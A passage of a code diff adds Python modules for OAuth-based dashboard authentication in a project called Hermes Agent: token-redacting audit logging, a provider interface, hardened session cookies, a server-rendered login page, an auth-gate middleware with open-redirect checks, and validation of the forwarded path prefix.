"InvalidCodeError",
"ProviderError",
"RefreshExpiredError",
"assert_protocol_compliance",
"register_provider",
"get_provider",
"list_providers",
"clear_providers",
]
+87
View File
@@ -0,0 +1,87 @@
"""Audit log for dashboard-auth events.
Profile-aware location: ``$HERMES_HOME/logs/dashboard-auth.log``.
Format: one JSON object per line. Token-like fields are stripped before
serialisation to avoid leaking refresh tokens or JWTs to disk.
This module deliberately keeps a minimal dependency surface no imports
from ``hermes_constants`` or other hermes_cli modules so it can be
imported safely from middleware code that loads early in the startup
sequence.
"""
from __future__ import annotations
import datetime as _dt
import enum
import json
import logging
import os
import threading
from pathlib import Path
from typing import Any
_log = logging.getLogger(__name__)
_write_lock = threading.Lock()
# Field names that must never appear in the log raw. Any kwarg matching
# these is silently dropped.
_REDACTED_FIELDS: frozenset = frozenset({
"access_token", "refresh_token", "code", "code_verifier",
"state", "ticket", "cookie", "Authorization", "authorization",
})
class AuditEvent(enum.Enum):
"""Event types written to dashboard-auth.log.
Values are the literal ``event`` field on the JSON line.
"""
LOGIN_START = "login_start"
LOGIN_SUCCESS = "login_success"
LOGIN_FAILURE = "login_failure"
LOGOUT = "logout"
REFRESH_SUCCESS = "refresh_success"
REFRESH_FAILURE = "refresh_failure"
REVOKE = "revoke"
SESSION_VERIFY_FAILURE = "session_verify_failure"
WS_TICKET_MINTED = "ws_ticket_minted"
WS_TICKET_REJECTED = "ws_ticket_rejected"
def _resolve_log_path() -> Path:
"""``$HERMES_HOME/logs/dashboard-auth.log`` with the standard fallback.
Mirrors ``hermes_constants.get_hermes_home`` semantics: env var wins,
else ``~/.hermes``. A local copy avoids an import cycle with the
middleware which lives below ``hermes_cli``.
"""
home = os.environ.get("HERMES_HOME") or str(Path.home() / ".hermes")
return Path(home) / "logs" / "dashboard-auth.log"
def audit_log(event: AuditEvent, **fields: Any) -> None:
"""Append one event to the audit log.
Token-like fields are dropped. Missing log directory is created.
Write failures are logged at WARNING but never raise auth must not
fail because the audit logger broke.
"""
safe_fields = {
k: v for k, v in fields.items()
if k not in _REDACTED_FIELDS
}
entry = {
"ts": _dt.datetime.now(_dt.timezone.utc).isoformat(),
"event": event.value,
**safe_fields,
}
line = json.dumps(entry, separators=(",", ":")) + "\n"
path = _resolve_log_path()
try:
path.parent.mkdir(parents=True, exist_ok=True)
with _write_lock:
with open(path, "a", encoding="utf-8") as f:
f.write(line)
except Exception as e:
_log.warning("dashboard-auth audit log write failed: %s", e)
+158
View File
@@ -0,0 +1,158 @@
"""Abstract base + dataclasses + exceptions for dashboard auth providers."""
from __future__ import annotations
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import Optional
@dataclass(frozen=True)
class Session:
"""A verified identity. Returned by ``complete_login`` and ``verify_session``.
All fields are mandatory. Providers that don't have a concept of orgs
should set ``org_id`` to an empty string. ``access_token`` and
``refresh_token`` are opaque to Hermes provider-specific.
"""
user_id: str
email: str
display_name: str
org_id: str
provider: str
expires_at: int # unix seconds; the access_token's exp claim
access_token: str
refresh_token: str
@dataclass(frozen=True)
class LoginStart:
"""First leg of the OAuth round trip.
``redirect_url`` is the URL the browser must navigate to (e.g. the
Portal's ``/oauth/authorize``). ``cookie_payload`` is a dict of cookie
name serialised value that the auth route will ``Set-Cookie`` on the
response. Used for PKCE state, CSRF nonces, etc. Cookies set here MUST
be HttpOnly + Secure (when over HTTPS) + SameSite=Lax with a TTL 10
minutes (the login lifetime).
"""
redirect_url: str
cookie_payload: dict[str, str]
class ProviderError(Exception):
"""IDP unreachable, network error, or other transient failure.
Middleware translates this to HTTP 503.
"""
class InvalidCodeError(Exception):
"""The OAuth callback ``code`` / ``state`` failed validation.
Middleware translates this to HTTP 400.
"""
class RefreshExpiredError(Exception):
"""The refresh token is dead.
Middleware clears cookies and forces re-login (302 ``/login``).
"""
class DashboardAuthProvider(ABC):
"""Protocol every dashboard-auth provider plugin implements.
Lifecycle:
1. ``start_login`` user clicks "Log in with X" on the login page.
Provider returns a redirect URL and any PKCE/CSRF state to stash
in short-lived cookies.
2. Browser bounces through the OAuth IDP and lands at /auth/callback.
3. ``complete_login`` exchange the code + verifier for a Session.
4. ``verify_session`` called on every request to validate the
access token in the cookie. Returns ``None`` if the token is
expired or invalid (middleware then triggers refresh or logout).
5. ``refresh_session`` called when the access token is near expiry.
Returns a new Session with rotated tokens.
6. ``revoke_session`` called on /auth/logout. Best-effort.
Failure semantics:
* ``start_login`` may raise ``ProviderError`` if the IDP is
unreachable.
* ``complete_login`` raises ``InvalidCodeError`` on bad code/state;
``ProviderError`` if the IDP is unreachable.
* ``verify_session`` returns ``None`` on expiry / unknown token;
raises ``ProviderError`` if the IDP is unreachable. Middleware
treats expiry and unreachable differently (expiry refresh;
unreachable 503).
* ``refresh_session`` raises ``RefreshExpiredError`` when the
refresh token is also invalid; middleware then forces re-login.
Raises ``ProviderError`` on network failure.
* ``revoke_session`` is best-effort and must not raise.
Subclasses MUST set ``name`` (lowercase identifier, stable forever)
and ``display_name`` (user-facing label on the login page).
"""
name: str = ""
display_name: str = ""
@abstractmethod
def start_login(self, *, redirect_uri: str) -> LoginStart: ...
@abstractmethod
def complete_login(
self,
*,
code: str,
state: str,
code_verifier: str,
redirect_uri: str,
) -> Session: ...
@abstractmethod
def verify_session(self, *, access_token: str) -> Optional[Session]: ...
@abstractmethod
def refresh_session(self, *, refresh_token: str) -> Session: ...
@abstractmethod
def revoke_session(self, *, refresh_token: str) -> None: ...
def assert_protocol_compliance(cls: type) -> None:
"""Raise ``TypeError`` if ``cls`` doesn't fully implement the provider protocol.
Call this in every provider plugin's unit tests::
def test_protocol_compliance():
assert_protocol_compliance(MyProvider)
Returns ``None`` on success so callers can assert it explicitly.
"""
required_methods = (
"start_login",
"complete_login",
"verify_session",
"refresh_session",
"revoke_session",
)
required_attrs = ("name", "display_name")
for attr in required_attrs:
val = getattr(cls, attr, "")
if not val:
raise TypeError(
f"{cls.__name__} missing or empty attribute: {attr!r}"
)
for method in required_methods:
if not callable(getattr(cls, method, None)):
raise TypeError(f"{cls.__name__} missing method: {method}")
# Also catch the ABC-not-overridden case.
if getattr(cls, "__abstractmethods__", None):
raise TypeError(
f"{cls.__name__} has unimplemented abstract methods: "
f"{sorted(cls.__abstractmethods__)}"
)
+234
View File
@@ -0,0 +1,234 @@
"""Cookie helpers for dashboard auth.
Three cookies in play:
- hermes_session_at: the OAuth access token
(HttpOnly, lifetime = token TTL)
- hermes_session_rt: the OAuth refresh token
(HttpOnly, lifetime = 30 days)
**DEPRECATED in OAuth contract v1** Nous Portal
does not issue refresh tokens; we keep the cookie
name and clear semantics for forward compatibility
and to flush stale cookies from old browsers.
- hermes_session_pkce: short-lived PKCE state + CSRF nonce + provider
hint (HttpOnly, lifetime = 10 minutes)
All three are ``SameSite=Lax`` (browser will send on cross-site GET
top-level navigation, which we need for the IDP redirect back to
``/auth/callback``) and live under the prefix's Path. ``Secure`` is set
ONLY when the dashboard was reached over HTTPS detected via the
request URL scheme, which honours ``X-Forwarded-Proto`` upstream of
Fly's TLS terminator when uvicorn is configured with
``proxy_headers=True``. Loopback dev traffic is always HTTP so
``Secure`` would lock the cookies out of the browser.
Cookie prefix selection (browser hardening per
https://datatracker.ietf.org/doc/html/draft-west-cookie-prefixes):
* Loopback HTTP bare name. ``__Host-`` / ``__Secure-`` require
``Secure``, which is incompatible with HTTP.
* Gated HTTPS, direct deploy (Path=/) ``__Host-`` prefix. Binds the
cookie to the exact origin (no Domain attribute) strongest spec
guarantee.
* Gated HTTPS, behind a reverse-proxy prefix (Path=/hermes)
``__Secure-`` prefix. ``__Host-`` is disallowed when Path != "/";
``__Secure-`` keeps the Secure-required hardening without the
Path constraint, and the explicit ``Path=/hermes`` covers
same-origin app isolation.
The setters and readers BOTH consult the active prefix because the
cookie *name* changes a reader that looked up the bare name when the
setter wrote ``__Secure-hermes_session_at`` would never find the value.
.. deprecated:: contract v1
``set_session_cookies`` accepts ``refresh_token=""`` (the contract-v1
default) and silently skips writing the RT cookie in that case.
``clear_session_cookies`` still emits a Max-Age=0 deletion for the RT
cookie so users carrying a stale cookie from an earlier deployment get
it cleared on logout / session expiry. The full refresh-flow machinery
was rewritten as "401 → redirect to /login" in Phase 6.
"""
from __future__ import annotations
from typing import Optional, Tuple
from fastapi import Request
from fastapi.responses import Response
# Bare cookie names — the request-scoped ``_resolved_name`` helper
# decides whether to prepend ``__Host-`` / ``__Secure-`` based on the
# request's HTTPS + prefix combination.
SESSION_AT_COOKIE = "hermes_session_at"
SESSION_RT_COOKIE = "hermes_session_rt"
PKCE_COOKIE = "hermes_session_pkce"
# Possible name variants we may have to read back. Sorted so most-strict
# wins on iteration when both happen to be present (shouldn't happen in
# practice — a single request emits exactly one variant).
_NAME_VARIANTS = ("__Host-", "__Secure-", "")
# 30 days — matches Portal's REFRESH_TOKEN_TTL_SECONDS
_RT_MAX_AGE = 30 * 24 * 60 * 60
_PKCE_MAX_AGE = 10 * 60
def _resolved_name(bare: str, *, use_https: bool, prefix: str) -> str:
"""Pick the cookie-prefix variant for the active request shape.
See module docstring for the prefix selection rules. Mismatch
between setter and reader would silently break sessions, so this
function is the single source of truth for naming.
"""
if not use_https:
return bare
if prefix:
# Path != "/" forbids __Host-; fall back to __Secure-.
return f"__Secure-{bare}"
return f"__Host-{bare}"
def _cookie_path(prefix: str) -> str:
"""Cookie ``Path`` attribute for the active deploy shape.
Under ``X-Forwarded-Prefix: /hermes`` we want ``Path=/hermes`` so:
a) the browser sends the cookie back on requests under the prefix
(browsers omit the cookie if request path doesn't start with
Path);
b) the cookie doesn't leak to other apps on the same origin
(``mission-control.tilos.com/billing/...``).
Direct-deploy (no proxy prefix) gets ``Path=/``.
"""
return prefix if prefix else "/"
def _common_attrs(*, use_https: bool, prefix: str) -> dict:
attrs: dict = {
"httponly": True,
"samesite": "lax",
"path": _cookie_path(prefix),
}
if use_https:
attrs["secure"] = True
return attrs
def set_session_cookies(
response: Response,
*,
access_token: str,
refresh_token: str,
access_token_expires_in: int,
use_https: bool,
prefix: str = "",
) -> None:
"""Set the session cookies on the response.
``access_token_expires_in`` is in seconds. Use the provider's reported
TTL for the access token.
``refresh_token`` is accepted for backward / forward compatibility but
SKIPPED when empty Nous Portal contract v1 issues no refresh tokens
so a ``Session.refresh_token == ""`` from the provider means we don't
persist anything. If a future contract revision starts emitting refresh
tokens, this helper will write the RT cookie again with no other change.
``prefix`` is the normalised X-Forwarded-Prefix value (e.g. ``/hermes``)
or ``""`` for a direct deploy. It influences both the cookie name
(``__Host-`` vs ``__Secure-`` vs bare) and the ``Path`` attribute.
"""
response.set_cookie(
_resolved_name(SESSION_AT_COOKIE, use_https=use_https, prefix=prefix),
access_token,
max_age=access_token_expires_in,
**_common_attrs(use_https=use_https, prefix=prefix),
)
# Contract v1: empty refresh token means "don't persist RT cookie".
# Keeping a literal empty-value cookie around would be dead state at
# best, attack surface at worst.
if refresh_token:
response.set_cookie(
_resolved_name(SESSION_RT_COOKIE, use_https=use_https, prefix=prefix),
refresh_token,
max_age=_RT_MAX_AGE,
**_common_attrs(use_https=use_https, prefix=prefix),
)
def clear_session_cookies(response: Response, *, prefix: str = "") -> None:
"""Emit Max-Age=0 deletions for both session cookies.
To delete a cookie reliably the deletion's ``Path`` must match the
set path AND the cookie name must match the variant the setter used.
We don't know which variant was originally set (cookie prefix
depends on the request that set it), so we emit deletions for every
plausible variant under the active path.
"""
path = _cookie_path(prefix)
for variant in _NAME_VARIANTS:
response.set_cookie(
f"{variant}{SESSION_AT_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
response.set_cookie(
f"{variant}{SESSION_RT_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
def set_pkce_cookie(
response: Response, *, payload: str, use_https: bool, prefix: str = "",
) -> None:
response.set_cookie(
_resolved_name(PKCE_COOKIE, use_https=use_https, prefix=prefix),
payload,
max_age=_PKCE_MAX_AGE,
**_common_attrs(use_https=use_https, prefix=prefix),
)
def clear_pkce_cookie(response: Response, *, prefix: str = "") -> None:
path = _cookie_path(prefix)
for variant in _NAME_VARIANTS:
response.set_cookie(
f"{variant}{PKCE_COOKIE}", "", max_age=0,
path=path, httponly=True, samesite="lax",
)
def _read_with_fallback(
request: Request, bare_name: str,
) -> Optional[str]:
"""Read a cookie by checking every prefix variant in order.
The setter chooses one variant based on the active request shape;
the reader doesn't know which one fired (the request that READS
the cookie may not be the same shape as the request that SET it
in pathological cases). Trying all three guarantees we find it.
"""
for variant in _NAME_VARIANTS:
value = request.cookies.get(f"{variant}{bare_name}")
if value is not None:
return value
return None
def read_session_cookies(request: Request) -> Tuple[Optional[str], Optional[str]]:
"""Returns (access_token, refresh_token), either may be None."""
at = _read_with_fallback(request, SESSION_AT_COOKIE)
rt = _read_with_fallback(request, SESSION_RT_COOKIE)
return at, rt
def read_pkce_cookie(request: Request) -> Optional[str]:
return _read_with_fallback(request, PKCE_COOKIE)
def detect_https(request: Request) -> bool:
"""Decide whether to set the ``Secure`` cookie flag.
Reads ``request.url.scheme`` under uvicorn's ``proxy_headers=True``
(which start_server enables when the gate is active), this honours
``X-Forwarded-Proto`` from Fly's TLS terminator. Loopback traffic is
always HTTP so this returns False there.
"""
return request.url.scheme == "https"
+384
View File
@@ -0,0 +1,384 @@
"""Server-rendered /login page.
No React, no JavaScript dependency. Listed providers come from the
registry; clicking a provider sends a GET to
``/auth/login?provider=<name>``.
Visual styling mirrors the Nous Research design system (the
``@nous-research/ui`` package the React dashboard uses): the same
``Collapse`` / ``Rules Compressed`` typeface, amber-on-dark colour
tokens (``#170d02`` / ``#ffac02`` / ``#fff``), uppercase + wide-tracking
brand chrome, and the inset-bevel button shadow. Fonts are served
out of the SPA's ``/fonts/`` directory which the dashboard-auth gate
already allowlists pre-auth (see ``_GATE_PUBLIC_PREFIXES`` in
``middleware.py``), so the page renders without needing the React
bundle loaded.
Test-stable class names: the existing test suite extracts the
``class="provider-btn"`` anchor href to walk the OAuth flow. That
class name MUST NOT change without updating
``tests/hermes_cli/test_dashboard_auth_401_reauth.py``.
"""
from __future__ import annotations
import html
from hermes_cli.dashboard_auth import list_providers
# Inline minimal CSS. The dashboard's full skin lives in the React
# bundle, which we deliberately do NOT load here — the login page must
# not depend on the SPA build being present or on the injected session
# token.
#
# Single curly braces are placeholders for ``str.format``; CSS curlies
# are doubled (``{{`` / ``}}``).
_LOGIN_HTML_TEMPLATE = """\
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sign in Hermes Agent</title>
<style>
/* Brand fonts shipped by @nous-research/ui same files the SPA loads. */
@font-face {{
font-family: 'Collapse';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/Collapse-Regular.woff2') format('woff2');
}}
@font-face {{
font-family: 'Collapse';
font-style: normal;
font-weight: 700;
font-display: swap;
src: url('/fonts/Collapse-Bold.woff2') format('woff2');
}}
@font-face {{
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/RulesCompressed-Regular.woff2') format('woff2');
}}
@font-face {{
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 600;
font-display: swap;
src: url('/fonts/RulesCompressed-Medium.woff2') format('woff2');
}}
:root {{
--background-base: #170d02;
--background: #170d02;
--midground: #ffac02;
--foreground: #ffffff;
--hairline: color-mix(in srgb, #ffac02 18%, transparent);
--hairline-strong: color-mix(in srgb, #ffac02 35%, transparent);
}}
*, *::before, *::after {{ box-sizing: border-box; }}
html, body {{
margin: 0;
padding: 0;
min-height: 100%;
background: var(--background-base);
color: var(--foreground);
font-family: 'Collapse', system-ui, -apple-system, "Segoe UI", Roboto, sans-serif;
font-size: 16px;
line-height: 1.5;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}}
/* Subtle dot-grid backdrop DS idiom (see `.dither` in globals.css). */
body {{
background-image:
radial-gradient(
ellipse at top,
color-mix(in srgb, var(--midground) 6%, transparent) 0%,
transparent 55%
),
repeating-conic-gradient(
color-mix(in srgb, var(--midground) 4%, transparent) 0% 25%,
transparent 0% 50%
);
background-size: auto, 3px 3px;
background-attachment: fixed;
}}
/* Layout: vertically center on tall screens, top-anchor on short. */
body {{
display: grid;
place-items: center;
padding: clamp(1.5rem, 6vh, 6rem) 1.25rem;
}}
main {{
width: 100%;
max-width: 26rem;
position: relative;
animation: slide-up 0.6s ease-out both;
}}
@keyframes slide-up {{
from {{ opacity: 0; transform: translateY(6px); }}
to {{ opacity: 1; transform: translateY(0); }}
}}
@media (prefers-reduced-motion: reduce) {{
main {{ animation: none; }}
}}
/* Brand wordmark above the card same uppercase + wide-tracking
idiom DS Buttons use. */
.brand {{
text-align: center;
margin-bottom: 1.75rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600;
font-size: 1.05rem;
letter-spacing: 0.32em;
text-transform: uppercase;
color: var(--midground);
}}
.brand .dot {{
display: inline-block;
width: 6px;
height: 6px;
background: var(--midground);
margin: 0 0.55em 0.18em;
vertical-align: middle;
border-radius: 1px;
}}
.card {{
position: relative;
padding: 2.25rem 2rem 2rem;
background: color-mix(in srgb, #ffffff 2%, var(--background-base));
border: 1px solid var(--hairline);
/* Hairline highlight + bevel shadow matches DS Button SHADOW_DEFAULT
(`inset -1px -1px 0 #00000080, inset 1px 1px 0 #ffffff80`) at panel scale. */
box-shadow:
inset 1px 1px 0 0 color-mix(in srgb, #ffffff 5%, transparent),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.4),
0 24px 60px -20px rgba(0, 0, 0, 0.6);
}}
h1 {{
margin: 0 0 0.4rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600;
font-size: 1.85rem;
letter-spacing: 0.05em;
text-transform: uppercase;
color: var(--foreground);
}}
.subtitle {{
margin: 0 0 1.75rem;
color: color-mix(in srgb, var(--foreground) 65%, transparent);
font-size: 0.95rem;
}}
.provider-list {{
display: grid;
gap: 0.75rem;
}}
/* Provider button mirrors DS Button (default variant):
amber surface, dark text, uppercase + wide tracking, inset bevel. */
.provider-btn {{
display: block;
width: 100%;
box-sizing: border-box;
padding: 0.95rem 1rem;
text-align: center;
background: var(--midground);
color: var(--background-base);
font-family: 'Collapse', sans-serif;
font-weight: 700;
font-size: 0.78rem;
letter-spacing: 0.2em;
text-transform: uppercase;
text-decoration: none;
border: 0;
border-radius: 0; /* DS Button is squared no rounded corners. */
cursor: pointer;
box-shadow:
inset 1px 1px 0 0 rgba(255, 255, 255, 0.5),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.5);
transition: filter 0.12s ease-out;
}}
.provider-btn:hover {{
filter: brightness(1.08);
}}
.provider-btn:active {{
/* DS Button uses `active:invert` on the default surface. */
filter: invert(1);
}}
.provider-btn:focus-visible {{
outline: 2px solid var(--midground);
outline-offset: 3px;
}}
footer {{
margin-top: 1.75rem;
text-align: center;
color: color-mix(in srgb, var(--foreground) 45%, transparent);
font-size: 0.75rem;
letter-spacing: 0.1em;
text-transform: uppercase;
line-height: 1.7;
}}
footer .sep {{
display: inline-block;
width: 1.5rem;
height: 1px;
background: var(--hairline-strong);
vertical-align: middle;
margin: 0 0.6em 0.2em;
}}
/* Selection DS uses midground bg + background text. */
::selection {{
background: var(--midground);
color: var(--background-base);
}}
</style>
</head>
<body>
<main>
<div class="brand">Nous<span class="dot"></span>Research</div>
<div class="card">
<h1>Sign in</h1>
<p class="subtitle">Choose a sign-in method to continue to the Hermes Agent dashboard.</p>
<div class="provider-list">
{provider_buttons}
</div>
</div>
<footer>
<span class="sep"></span>Public bind &middot; Auth required<span class="sep"></span>
</footer>
</main>
</body>
</html>
"""
_EMPTY_HTML = """\
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sign-in unavailable Hermes Agent</title>
<style>
@font-face {
font-family: 'Collapse';
font-style: normal;
font-weight: 400;
font-display: swap;
src: url('/fonts/Collapse-Regular.woff2') format('woff2');
}
@font-face {
font-family: 'Rules Compressed';
font-style: normal;
font-weight: 600;
font-display: swap;
src: url('/fonts/RulesCompressed-Medium.woff2') format('woff2');
}
:root {
--background-base: #170d02;
--midground: #ffac02;
--foreground: #ffffff;
--hairline: color-mix(in srgb, #ffac02 18%, transparent);
}
*, *::before, *::after { box-sizing: border-box; }
html, body {
margin: 0; padding: 0; min-height: 100%;
background: var(--background-base);
color: var(--foreground);
font-family: 'Collapse', system-ui, -apple-system, "Segoe UI", Roboto, sans-serif;
font-size: 16px; line-height: 1.5;
-webkit-font-smoothing: antialiased;
}
body {
display: grid; place-items: center;
padding: clamp(1.5rem, 6vh, 6rem) 1.25rem;
}
main {
width: 100%; max-width: 32rem;
padding: 2.25rem 2rem;
background: color-mix(in srgb, #ffffff 2%, var(--background-base));
border: 1px solid var(--hairline);
box-shadow:
inset 1px 1px 0 0 color-mix(in srgb, #ffffff 5%, transparent),
inset -1px -1px 0 0 rgba(0, 0, 0, 0.4),
0 24px 60px -20px rgba(0, 0, 0, 0.6);
}
h1 {
margin: 0 0 1rem;
font-family: 'Rules Compressed', 'Collapse', sans-serif;
font-weight: 600; font-size: 1.5rem;
letter-spacing: 0.05em; text-transform: uppercase;
color: var(--midground);
}
p { margin: 0 0 1rem; }
code {
background: var(--midground);
color: var(--background-base);
padding: 0.1em 0.35em;
font-family: 'Courier New', monospace;
font-size: 0.9em;
}
</style>
</head>
<body>
<main>
<h1>Sign-in unavailable</h1>
<p>This dashboard is bound to a non-loopback host but no authentication
providers are installed.</p>
<p>Install <code>plugins/dashboard-auth-nous</code> (default) or another
auth provider, or restart with <code>--insecure</code> to bypass the
auth gate (not recommended on untrusted networks).</p>
</main>
</body>
</html>
"""
def render_login_html(*, next_path: str = "") -> str:
"""Return the full HTML for ``GET /login``.
``next_path`` when set, the post-login landing path the user
originally requested. Threaded into each provider button's ``href``
as a ``next=`` query parameter so the OAuth round trip carries it
end-to-end. The caller (``routes.login_page``) is responsible for
validating ``next_path`` against the same-origin rules before we
emit it; we still HTML-escape it as defence in depth.
"""
providers = list_providers()
if not providers:
return _EMPTY_HTML
if next_path:
# URL-encode then HTML-escape. The URL-encode step matches the
# gate's ``_safe_next_target`` output shape (also URL-encoded),
# so a value that round-tripped from /login?next=... back into
# the button href is byte-identical.
from urllib.parse import quote
next_qs = f"&next={html.escape(quote(next_path, safe=''), quote=True)}"
else:
next_qs = ""
buttons = []
for p in providers:
buttons.append(
f' <a class="provider-btn" '
f'href="/auth/login?provider={html.escape(p.name, quote=True)}{next_qs}">'
f'Sign in with {html.escape(p.display_name)}</a>'
)
return _LOGIN_HTML_TEMPLATE.format(provider_buttons="\n".join(buttons))
+207
View File
@@ -0,0 +1,207 @@
"""Auth-gate middleware for the dashboard.
Engaged when ``app.state.auth_required is True``. The gate's job:
1. Allow a small set of routes through unauthenticated (login page,
``/auth/*`` OAuth round trip, ``/api/auth/providers``, static
assets).
2. For everything else, demand a valid session cookie and attach the
verified :class:`Session` to ``request.state.session``.
3. On HTML routes, redirect missing/invalid cookies to ``/login``.
On ``/api/*`` routes, return 401 JSON.
The middleware is a no-op when ``auth_required`` is False (loopback
mode); the legacy ``_SESSION_TOKEN`` ``auth_middleware`` handles those
binds.
"""
from __future__ import annotations
import logging
from typing import Awaitable, Callable
from fastapi import Request
from fastapi.responses import JSONResponse, RedirectResponse, Response
from hermes_cli.dashboard_auth import list_providers
from hermes_cli.dashboard_auth.audit import AuditEvent, audit_log
from hermes_cli.dashboard_auth.base import ProviderError
from hermes_cli.dashboard_auth.cookies import read_session_cookies
_log = logging.getLogger(__name__)
# Paths that bypass the auth gate. Order matters: prefix match.
_GATE_PUBLIC_PREFIXES: tuple[str, ...] = (
"/auth/login",
"/auth/callback",
"/auth/logout",
"/login",
"/api/auth/providers",
"/assets/",
"/favicon.ico",
"/ds-assets/",
"/fonts/",
"/fonts-terminal/",
)
def _path_is_public(path: str) -> bool:
return any(
path == prefix or path.startswith(prefix)
for prefix in _GATE_PUBLIC_PREFIXES
)
def _client_ip(request: Request) -> str:
fwd = request.headers.get("x-forwarded-for", "")
if fwd:
return fwd.split(",")[0].strip()
return request.client.host if request.client else ""
def _unauth_response(request: Request, *, reason: str) -> Response:
"""API routes → 401 JSON with ``login_url``; HTML routes → 302 → /login.
The JSON envelope carries a ``login_url`` field with a ``next=`` query
string so the SPA's global 401 handler can drop the user back where
they were after re-auth. The contract is intentionally simple so any
fetch-wrapper can implement the redirect without parsing details:
if response.status === 401 && body.error in ("unauthenticated",
"session_expired"):
window.location.assign(body.login_url);
HTML redirects also carry the ``next=`` query string so direct
navigation to ``/sessions`` (etc.) without a cookie comes back to
``/sessions`` after login.
Under a reverse proxy with ``X-Forwarded-Prefix: /hermes``, the
``login_url`` is prefixed (``/hermes/login?next=...``) so the
browser's window.location.assign / Location: follow lands on the
proxied login page rather than the bare ``/login`` (which the
proxy doesn't route to the dashboard).
"""
from hermes_cli.dashboard_auth.prefix import prefix_from_request
path = request.url.path
next_param = _safe_next_target(request)
prefix = prefix_from_request(request)
login_url = (
f"{prefix}/login?next={next_param}" if next_param
else f"{prefix}/login"
)
if path.startswith("/api/"):
# API routes never get redirects: the browser fetch() API would
# follow a 302 into the cross-origin OAuth dance opaquely. Return
# 401 with a structured envelope so the SPA can full-page-navigate
# to login_url.
error_code = (
"session_expired"
if reason == "invalid_or_expired_session"
else "unauthenticated"
)
return JSONResponse(
{
"error": error_code,
"detail": "Unauthorized",
"reason": reason,
"login_url": login_url,
},
status_code=401,
)
return RedirectResponse(url=login_url, status_code=302)
def _safe_next_target(request: Request) -> str:
"""Build the URL-encoded ``next`` query value, or empty string.
Only same-origin relative paths are accepted; absolute URLs or
``//evil.com`` open-redirect attempts are silently dropped. The empty
string return means the caller produces a bare ``/login`` URL fine,
user lands at the dashboard root after re-auth.
"""
path = request.url.path
# Reject anything that doesn't start with "/" or starts with "//"
# (protocol-relative URL — would open-redirect to an attacker host).
if not path or not path.startswith("/") or path.startswith("//"):
return ""
# Don't redirect back to the auth routes themselves — that loops.
if any(
path == p or path.startswith(p)
for p in ("/login", "/auth/", "/api/auth/")
):
return ""
# Preserve query string if present (e.g. /sessions?page=2).
query = request.url.query
target = f"{path}?{query}" if query else path
# urlencode the whole thing as a single value.
from urllib.parse import quote
return quote(target, safe="")
async def gated_auth_middleware(
request: Request,
call_next: Callable[[Request], Awaitable[Response]],
) -> Response:
"""Engaged only when ``app.state.auth_required is True``.
No-op pass-through in loopback mode so the legacy auth_middleware can
handle those binds via ``_SESSION_TOKEN``.
"""
if not getattr(request.app.state, "auth_required", False):
return await call_next(request)
path = request.url.path
if _path_is_public(path):
return await call_next(request)
at, _rt = read_session_cookies(request)
if not at:
return _unauth_response(request, reason="no_cookie")
# Try every registered provider's verify_session in turn. Providers
# MUST return None for tokens they don't recognise (not raise). This
# lets multiple providers stack — the first one that recognises a
# token wins.
session = None
for provider in list_providers():
try:
session = provider.verify_session(access_token=at)
except ProviderError as e:
_log.warning(
"dashboard-auth: provider %r unreachable during verify: %s",
provider.name, e,
)
audit_log(
AuditEvent.SESSION_VERIFY_FAILURE,
provider=provider.name,
reason="provider_unreachable",
ip=_client_ip(request),
)
return JSONResponse(
{"detail": f"Auth provider {provider.name!r} unreachable"},
status_code=503,
)
if session is not None:
break
if session is None:
audit_log(
AuditEvent.SESSION_VERIFY_FAILURE,
reason="no_provider_recognises",
ip=_client_ip(request),
)
response = _unauth_response(request, reason="invalid_or_expired_session")
# Clear the dead cookie so the browser doesn't keep sending it.
# Contract v1: no refresh token to retry with, so the only correct
# next step is full re-auth via /login. Importing locally avoids a
# cycle with cookies → middleware at module load. Pass the active
# prefix so the deletion's Path matches the set-Path (otherwise
# the browser ignores it).
from hermes_cli.dashboard_auth.cookies import clear_session_cookies
from hermes_cli.dashboard_auth.prefix import prefix_from_request
clear_session_cookies(response, prefix=prefix_from_request(request))
return response
request.state.session = session
return await call_next(request)
+157
View File
@@ -0,0 +1,157 @@
"""Helpers for X-Forwarded-Prefix support.
Mission-control style deploys reverse-proxy the dashboard at a path
prefix (e.g. ``mission-control.tilos.com/hermes/*`` -> dashboard on
:9119), injecting ``X-Forwarded-Prefix: /hermes`` so the backend can
reconstruct prefixed URLs (Location: headers, OAuth redirect_uri,
cookie Path attributes, SPA asset URLs).
This module is also the home of the ``HERMES_DASHBOARD_PUBLIC_URL`` /
``dashboard.public_url`` resolution when the operator declares a
complete public URL (scheme + host + optional path prefix), we use
that directly for the OAuth ``redirect_uri`` and skip the
X-Forwarded-Prefix reconstruction. Relief valve for deploys where the
proxy header chain isn't reliable.
The single source of truth for both helpers lives here so the gate
middleware, the OAuth routes, the cookie helpers, and the SPA mount
all agree on validation rules.
"""
from __future__ import annotations
import logging
import os
import urllib.parse
from typing import Optional
_log = logging.getLogger(__name__)
# Characters that, if present in a public_url or prefix value, indicate
# either a typo or a header-injection attempt. Reject the whole value
# rather than try to sanitise — the operator can fix their config.
_REJECT_CHARS = frozenset(('"', "'", "<", ">", " ", "\n", "\r", "\t"))
def normalise_prefix(raw: Optional[str]) -> str:
"""Normalise an X-Forwarded-Prefix header value.
Returns a string like ``"/hermes"`` (no trailing slash) or ``""``
when no prefix is set / the header is malformed. We deliberately
reject anything containing ``..`` or non-printable bytes so a
hostile proxy can't inject HTML or path-traversal sequences via the
prefix.
"""
if not raw:
return ""
p = raw.strip()
if not p:
return ""
if not p.startswith("/"):
p = "/" + p
p = p.rstrip("/")
if (
"//" in p
or ".." in p
or any(c in p for c in _REJECT_CHARS)
):
return ""
if len(p) > 64:
return ""
return p
def prefix_from_request(request) -> str:
